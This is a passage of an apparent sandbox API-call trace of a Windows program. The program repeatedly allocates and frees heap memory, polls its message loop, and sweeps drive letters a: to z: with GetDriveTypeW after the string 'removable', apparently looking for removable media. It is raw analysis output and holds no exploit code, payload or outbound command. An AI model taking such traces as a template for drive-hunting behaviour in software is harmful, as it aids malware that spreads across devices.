(lpMsg=0x7dfb8c) returned 0x0 [0217.790] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.790] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.790] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0217.790] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.790] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.790] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0217.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0217.791] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.791] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.791] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0217.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.791] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.791] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.791] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0217.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.792] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.792] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0217.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.792] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.792] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.793] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.793] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.793] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.793] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.793] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.794] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.794] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.794] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.795] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.795] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.795] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.795] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.796] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.796] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.796] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.796] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.796] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.797] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.797] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.797] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.797] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.797] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.798] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.798] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.798] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.798] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.798] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0217.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0217.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.799] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.799] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.799] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.799] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.799] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.799] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0217.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.799] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0217.800] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0217.800] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.800] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.800] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0217.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.800] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0217.801] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0217.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.801] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.801] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.801] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.801] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.802] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.802] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.802] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.802] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.802] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.802] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.803] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.803] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.803] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.803] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.804] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.804] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.804] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.805] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.805] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.805] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.805] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.806] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.806] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.806] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.806] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.807] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.807] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0217.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.807] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.807] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0217.807] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0217.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0217.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.808] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0217.808] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0217.808] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.808] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.808] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.808] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.808] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.809] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.809] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.809] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.809] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.809] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.809] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.809] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.810] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.810] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.810] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.810] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.810] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.810] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.811] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.811] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.811] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.811] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.811] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.812] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.812] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.812] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.812] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.812] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.812] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.813] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.813] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.813] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.813] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.814] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.814] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.814] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.814] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 